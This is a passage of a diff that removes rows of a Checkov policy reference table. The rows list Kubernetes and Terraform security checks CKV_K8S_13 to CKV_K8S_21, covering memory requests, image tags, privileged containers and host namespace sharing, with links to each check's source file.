-| 2510 | CKV_K8S_13               | resource                         | kubernetes_deployment                                                                            | Memory requests should be set                                                                                                                                                                            | Terraform               | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py)                                                                                    |
-| 2511 | CKV_K8S_13               | resource                         | kubernetes_deployment_v1                                                                         | Memory requests should be set                                                                                                                                                                            | Terraform               | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py)                                                                                    |
-| 2512 | CKV_K8S_13               | resource                         | kubernetes_pod                                                                                   | Memory requests should be set                                                                                                                                                                            | Terraform               | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py)                                                                                    |
-| 2513 | CKV_K8S_13               | resource                         | kubernetes_pod_v1                                                                                | Memory requests should be set                                                                                                                                                                            | Terraform               | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py)                                                                                    |
-| 2514 | CKV_K8S_14               | resource                         | CronJob                                                                                          | Image Tag should be fixed - not latest or blank                                                                                                                                                          | Kubernetes              | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py)                                                                                            |
-| 2515 | CKV_K8S_14               | resource                         | DaemonSet                                                                                        | Image Tag should be fixed - not latest or blank                                                                                                                                                          | Kubernetes              | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py)                                                                                            |
-| 2516 | CKV_K8S_14               | resource                         | Deployment                                                                                       | Image Tag should be fixed - not latest or blank                                                                                                                                                          | Kubernetes              | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py)                                                                                            |
-| 2517 | CKV_K8S_14               | resource                         | DeploymentConfig                                                                                 | Image Tag should be fixed - not latest or blank                                                                                                                                                          | Kubernetes              | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py)                                                                                            |
-| 2518 | CKV_K8S_14               | resource                         | Job                                                                                              | Image Tag should be fixed - not latest or blank                                                                                                                                                          | Kubernetes              | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py)                                                                                            |
-| 2519 | CKV_K8S_14               | resource                         | Pod                                                                                              | Image Tag should be fixed - not latest or blank                                                                                                                                                          | Kubernetes              | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py)                                                                                            |
-| 2520 | CKV_K8S_14               | resource                         | PodTemplate                                                                                      | Image Tag should be fixed - not latest or blank                                                                                                                                                          | Kubernetes              | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py)                                                                                            |
-| 2521 | CKV_K8S_14               | resource                         | ReplicaSet                                                                                       | Image Tag should be fixed - not latest or blank                                                                                                                                                          | Kubernetes              | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py)                                                                                            |
-| 2522 | CKV_K8S_14               | resource                         | ReplicationController                                                                            | Image Tag should be fixed - not latest or blank                                                                                                                                                          | Kubernetes              | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py)                                                                                            |
-| 2523 | CKV_K8S_14               | resource                         | StatefulSet                                                                                      | Image Tag should be fixed - not latest or blank                                                                                                                                                          | Kubernetes              | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py)                                                                                            |
-| 2524 | CKV_K8S_14               | resource                         | kubernetes_deployment                                                                            | Image Tag should be fixed - not latest or blank                                                                                                                                                          | Terraform               | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py)                                                                                      |
-| 2525 | CKV_K8S_14               | resource                         | kubernetes_deployment_v1                                                                         | Image Tag should be fixed - not latest or blank                                                                                                                                                          | Terraform               | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py)                                                                                      |
-| 2526 | CKV_K8S_14               | resource                         | kubernetes_pod                                                                                   | Image Tag should be fixed - not latest or blank                                                                                                                                                          | Terraform               | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py)                                                                                      |
-| 2527 | CKV_K8S_14               | resource                         | kubernetes_pod_v1                                                                                | Image Tag should be fixed - not latest or blank                                                                                                                                                          | Terraform               | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py)                                                                                      |
-| 2528 | CKV_K8S_15               | resource                         | CronJob                                                                                          | Image Pull Policy should be Always                                                                                                                                                                       | Kubernetes              | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py)                                                                            |
-| 2529 | CKV_K8S_15               | resource                         | DaemonSet                                                                                        | Image Pull Policy should be Always                                                                                                                                                                       | Kubernetes              | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py)                                                                            |
-| 2530 | CKV_K8S_15               | resource                         | Deployment                                                                                       | Image Pull Policy should be Always                                                                                                                                                                       | Kubernetes              | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py)                                                                            |
-| 2531 | CKV_K8S_15               | resource                         | DeploymentConfig                                                                                 | Image Pull Policy should be Always                                                                                                                                                                       | Kubernetes              | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py)                                                                            |
-| 2532 | CKV_K8S_15               | resource                         | Job                                                                                              | Image Pull Policy should be Always                                                                                                                                                                       | Kubernetes              | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py)                                                                            |
-| 2533 | CKV_K8S_15               | resource                         | Pod                                                                                              | Image Pull Policy should be Always                                                                                                                                                                       | Kubernetes              | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py)                                                                            |
-| 2534 | CKV_K8S_15               | resource                         | PodTemplate                                                                                      | Image Pull Policy should be Always                                                                                                                                                                       | Kubernetes              | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py)                                                                            |
-| 2535 | CKV_K8S_15               | resource                         | ReplicaSet                                                                                       | Image Pull Policy should be Always                                                                                                                                                                       | Kubernetes              | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py)                                                                            |
-| 2536 | CKV_K8S_15               | resource                         | ReplicationController                                                                            | Image Pull Policy should be Always                                                                                                                                                                       | Kubernetes              | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py)                                                                            |
-| 2537 | CKV_K8S_15               | resource                         | StatefulSet                                                                                      | Image Pull Policy should be Always                                                                                                                                                                       | Kubernetes              | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py)                                                                            |
-| 2538 | CKV_K8S_15               | resource                         | kubernetes_deployment                                                                            | Image Pull Policy should be Always                                                                                                                                                                       | Terraform               | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py)                                                                      |
-| 2539 | CKV_K8S_15               | resource                         | kubernetes_deployment_v1                                                                         | Image Pull Policy should be Always                                                                                                                                                                       | Terraform               | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py)                                                                      |
-| 2540 | CKV_K8S_15               | resource                         | kubernetes_pod                                                                                   | Image Pull Policy should be Always                                                                                                                                                                       | Terraform               | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py)                                                                      |
-| 2541 | CKV_K8S_15               | resource                         | kubernetes_pod_v1                                                                                | Image Pull Policy should be Always                                                                                                                                                                       | Terraform               | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py)                                                                      |
-| 2542 | CKV_K8S_16               | resource                         | CronJob                                                                                          | Container should not be privileged                                                                                                                                                                       | Kubernetes              | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py)                                                                              |
-| 2543 | CKV_K8S_16               | resource                         | DaemonSet                                                                                        | Container should not be privileged                                                                                                                                                                       | Kubernetes              | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py)                                                                              |
-| 2544 | CKV_K8S_16               | resource                         | Deployment                                                                                       | Container should not be privileged                                                                                                                                                                       | Kubernetes              | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py)                                                                              |
-| 2545 | CKV_K8S_16               | resource                         | DeploymentConfig                                                                                 | Container should not be privileged                                                                                                                                                                       | Kubernetes              | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py)                                                                              |
-| 2546 | CKV_K8S_16               | resource                         | Job                                                                                              | Container should not be privileged                                                                                                                                                                       | Kubernetes              | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py)                                                                              |
-| 2547 | CKV_K8S_16               | resource                         | Pod                                                                                              | Container should not be privileged                                                                                                                                                                       | Kubernetes              | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py)                                                                              |
-| 2548 | CKV_K8S_16               | resource                         | PodTemplate                                                                                      | Container should not be privileged                                                                                                                                                                       | Kubernetes              | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py)                                                                              |
-| 2549 | CKV_K8S_16               | resource                         | ReplicaSet                                                                                       | Container should not be privileged                                                                                                                                                                       | Kubernetes              | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py)                                                                              |
-| 2550 | CKV_K8S_16               | resource                         | ReplicationController                                                                            | Container should not be privileged                                                                                                                                                                       | Kubernetes              | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py)                                                                              |
-| 2551 | CKV_K8S_16               | resource                         | StatefulSet                                                                                      | Container should not be privileged                                                                                                                                                                       | Kubernetes              | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py)                                                                              |
-| 2552 | CKV_K8S_16               | resource                         | kubernetes_deployment                                                                            | Do not admit privileged containers                                                                                                                                                                       | Terraform               | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py)                                                                          |
-| 2553 | CKV_K8S_16               | resource                         | kubernetes_deployment_v1                                                                         | Do not admit privileged containers                                                                                                                                                                       | Terraform               | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py)                                                                          |
-| 2554 | CKV_K8S_16               | resource                         | kubernetes_pod                                                                                   | Do not admit privileged containers                                                                                                                                                                       | Terraform               | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py)                                                                          |
-| 2555 | CKV_K8S_16               | resource                         | kubernetes_pod_v1                                                                                | Do not admit privileged containers                                                                                                                                                                       | Terraform               | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py)                                                                          |
-| 2556 | CKV_K8S_17               | resource                         | CronJob                                                                                          | Containers should not share the host process ID namespace                                                                                                                                                | Kubernetes              | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py)                                                                                              |
-| 2557 | CKV_K8S_17               | resource                         | DaemonSet                                                                                        | Containers should not share the host process ID namespace                                                                                                                                                | Kubernetes              | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py)                                                                                              |
-| 2558 | CKV_K8S_17               | resource                         | Deployment                                                                                       | Containers should not share the host process ID namespace                                                                                                                                                | Kubernetes              | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py)                                                                                              |
-| 2559 | CKV_K8S_17               | resource                         | Job                                                                                              | Containers should not share the host process ID namespace                                                                                                                                                | Kubernetes              | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py)                                                                                              |
-| 2560 | CKV_K8S_17               | resource                         | Pod                                                                                              | Containers should not share the host process ID namespace                                                                                                                                                | Kubernetes              | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py)                                                                                              |
-| 2561 | CKV_K8S_17               | resource                         | ReplicaSet                                                                                       | Containers should not share the host process ID namespace                                                                                                                                                | Kubernetes              | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py)                                                                                              |
-| 2562 | CKV_K8S_17               | resource                         | ReplicationController                                                                            | Containers should not share the host process ID namespace                                                                                                                                                | Kubernetes              | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py)                                                                                              |
-| 2563 | CKV_K8S_17               | resource                         | StatefulSet                                                                                      | Containers should not share the host process ID namespace                                                                                                                                                | Kubernetes              | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py)                                                                                              |
-| 2564 | CKV_K8S_17               | resource                         | kubernetes_deployment                                                                            | Do not admit containers wishing to share the host process ID namespace                                                                                                                                   | Terraform               | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py)                                                                                        |
-| 2565 | CKV_K8S_17               | resource                         | kubernetes_deployment_v1                                                                         | Do not admit containers wishing to share the host process ID namespace                                                                                                                                   | Terraform               | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py)                                                                                        |
-| 2566 | CKV_K8S_17               | resource                         | kubernetes_pod                                                                                   | Do not admit containers wishing to share the host process ID namespace                                                                                                                                   | Terraform               | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py)                                                                                        |
-| 2567 | CKV_K8S_17               | resource                         | kubernetes_pod_v1                                                                                | Do not admit containers wishing to share the host process ID namespace                                                                                                                                   | Terraform               | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py)                                                                                        |
-| 2568 | CKV_K8S_18               | resource                         | CronJob                                                                                          | Containers should not share the host IPC namespace                                                                                                                                                       | Kubernetes              | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py)                                                                                              |
-| 2569 | CKV_K8S_18               | resource                         | DaemonSet                                                                                        | Containers should not share the host IPC namespace                                                                                                                                                       | Kubernetes              | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py)                                                                                              |
-| 2570 | CKV_K8S_18               | resource                         | Deployment                                                                                       | Containers should not share the host IPC namespace                                                                                                                                                       | Kubernetes              | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py)                                                                                              |
-| 2571 | CKV_K8S_18               | resource                         | Job                                                                                              | Containers should not share the host IPC namespace                                                                                                                                                       | Kubernetes              | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py)                                                                                              |
-| 2572 | CKV_K8S_18               | resource                         | Pod                                                                                              | Containers should not share the host IPC namespace                                                                                                                                                       | Kubernetes              | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py)                                                                                              |
-| 2573 | CKV_K8S_18               | resource                         | ReplicaSet                                                                                       | Containers should not share the host IPC namespace                                                                                                                                                       | Kubernetes              | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py)                                                                                              |
-| 2574 | CKV_K8S_18               | resource                         | ReplicationController                                                                            | Containers should not share the host IPC namespace                                                                                                                                                       | Kubernetes              | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py)                                                                                              |
-| 2575 | CKV_K8S_18               | resource                         | StatefulSet                                                                                      | Containers should not share the host IPC namespace                                                                                                                                                       | Kubernetes              | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py)                                                                                              |
-| 2576 | CKV_K8S_18               | resource                         | kubernetes_deployment                                                                            | Do not admit containers wishing to share the host IPC namespace                                                                                                                                          | Terraform               | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py)                                                                                        |
-| 2577 | CKV_K8S_18               | resource                         | kubernetes_deployment_v1                                                                         | Do not admit containers wishing to share the host IPC namespace                                                                                                                                          | Terraform               | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py)                                                                                        |
-| 2578 | CKV_K8S_18               | resource                         | kubernetes_pod                                                                                   | Do not admit containers wishing to share the host IPC namespace                                                                                                                                          | Terraform               | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py)                                                                                        |
-| 2579 | CKV_K8S_18               | resource                         | kubernetes_pod_v1                                                                                | Do not admit containers wishing to share the host IPC namespace                                                                                                                                          | Terraform               | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py)                                                                                        |
-| 2580 | CKV_K8S_19               | resource                         | CronJob                                                                                          | Containers should not share the host network namespace                                                                                                                                                   | Kubernetes              | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py)                                                                  |
-| 2581 | CKV_K8S_19               | resource                         | DaemonSet                                                                                        | Containers should not share the host network namespace                                                                                                                                                   | Kubernetes              | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py)                                                                  |
-| 2582 | CKV_K8S_19               | resource                         | Deployment                                                                                       | Containers should not share the host network namespace                                                                                                                                                   | Kubernetes              | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py)                                                                  |
-| 2583 | CKV_K8S_19               | resource                         | Job                                                                                              | Containers should not share the host network namespace                                                                                                                                                   | Kubernetes              | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py)                                                                  |
-| 2584 | CKV_K8S_19               | resource                         | Pod                                                                                              | Containers should not share the host network namespace                                                                                                                                                   | Kubernetes              | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py)                                                                  |
-| 2585 | CKV_K8S_19               | resource                         | ReplicaSet                                                                                       | Containers should not share the host network namespace                                                                                                                                                   | Kubernetes              | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py)                                                                  |
-| 2586 | CKV_K8S_19               | resource                         | ReplicationController                                                                            | Containers should not share the host network namespace                                                                                                                                                   | Kubernetes              | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py)                                                                  |
-| 2587 | CKV_K8S_19               | resource                         | StatefulSet                                                                                      | Containers should not share the host network namespace                                                                                                                                                   | Kubernetes              | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py)                                                                  |
-| 2588 | CKV_K8S_19               | resource                         | kubernetes_deployment                                                                            | Do not admit containers wishing to share the host network namespace                                                                                                                                      | Terraform               | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py)                                                            |
-| 2589 | CKV_K8S_19               | resource                         | kubernetes_deployment_v1                                                                         | Do not admit containers wishing to share the host network namespace                                                                                                                                      | Terraform               | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py)                                                            |
-| 2590 | CKV_K8S_19               | resource                         | kubernetes_pod                                                                                   | Do not admit containers wishing to share the host network namespace                                                                                                                                      | Terraform               | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py)                                                            |
-| 2591 | CKV_K8S_19               | resource                         | kubernetes_pod_v1                                                                                | Do not admit containers wishing to share the host network namespace                                                                                                                                      | Terraform               | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py)                                                            |
-| 2592 | CKV_K8S_20               | resource                         | CronJob                                                                                          | Containers should not run with allowPrivilegeEscalation                                                                                                                                                  | Kubernetes              | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py)                                                                      |
-| 2593 | CKV_K8S_20               | resource                         | DaemonSet                                                                                        | Containers should not run with allowPrivilegeEscalation                                                                                                                                                  | Kubernetes              | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py)                                                                      |
-| 2594 | CKV_K8S_20               | resource                         | Deployment                                                                                       | Containers should not run with allowPrivilegeEscalation                                                                                                                                                  | Kubernetes              | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py)                                                                      |
-| 2595 | CKV_K8S_20               | resource                         | DeploymentConfig                                                                                 | Containers should not run with allowPrivilegeEscalation                                                                                                                                                  | Kubernetes              | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py)                                                                      |
-| 2596 | CKV_K8S_20               | resource                         | Job                                                                                              | Containers should not run with allowPrivilegeEscalation                                                                                                                                                  | Kubernetes              | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py)                                                                      |
-| 2597 | CKV_K8S_20               | resource                         | Pod                                                                                              | Containers should not run with allowPrivilegeEscalation                                                                                                                                                  | Kubernetes              | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py)                                                                      |
-| 2598 | CKV_K8S_20               | resource                         | PodTemplate                                                                                      | Containers should not run with allowPrivilegeEscalation                                                                                                                                                  | Kubernetes              | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py)                                                                      |
-| 2599 | CKV_K8S_20               | resource                         | ReplicaSet                                                                                       | Containers should not run with allowPrivilegeEscalation                                                                                                                                                  | Kubernetes              | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py)                                                                      |
-| 2600 | CKV_K8S_20               | resource                         | ReplicationController                                                                            | Containers should not run with allowPrivilegeEscalation                                                                                                                                                  | Kubernetes              | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py)                                                                      |
-| 2601 | CKV_K8S_20               | resource                         | StatefulSet                                                                                      | Containers should not run with allowPrivilegeEscalation                                                                                                                                                  | Kubernetes              | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py)                                                                      |
-| 2602 | CKV_K8S_20               | resource                         | kubernetes_deployment                                                                            | Containers should not run with allowPrivilegeEscalation                                                                                                                                                  | Terraform               | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py)                                                                |
-| 2603 | CKV_K8S_20               | resource                         | kubernetes_deployment_v1                                                                         | Containers should not run with allowPrivilegeEscalation                                                                                                                                                  | Terraform               | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py)                                                                |
-| 2604 | CKV_K8S_20               | resource                         | kubernetes_pod                                                                                   | Containers should not run with allowPrivilegeEscalation                                                                                                                                                  | Terraform               | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py)                                                                |
-| 2605 | CKV_K8S_20               | resource                         | kubernetes_pod_v1                                                                                | Containers should not run with allowPrivilegeEscalation                                                                                                                                                  | Terraform               | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py)                                                                |
-| 2606 | CKV_K8S_21               | resource                         | ConfigMap                                                                                        | The default namespace should not be used                                                                                                                                                                 | Kubernetes              | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py)                                                                                      |
-| 2607 | CKV_K8S_21               | resource                         | CronJob                                                                                          | The default namespace should not be used                                                                                                                                                                 | Kubernetes              | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py)                                                                                      |
-| 2608 | CKV_K8S_21               | resource                         | DaemonSet                                                                                        | The default namespace should not be used                                                                                                                                                                 | Kubernetes              | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py)                                                                                      |
-| 2609 | CKV_K8S_21               | resource                         | Deployment                                                                                       | The default namespace should not be used                                                                                                                                                                 | Kubernetes              | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py)                                                                                      |
-| 2610 | CKV_K8S_21               | resource                         | Ingress                                                                                          | The default namespace should not be used                                                                                                                                                                 | Kubernetes              | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py)                                                                                      |
-| 2611 | CKV_K8S_21               | resource                         | Job                                                                                              | The default namespace should not be used                                                                                                                                                                 | Kubernetes              | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py)                                                                                      |
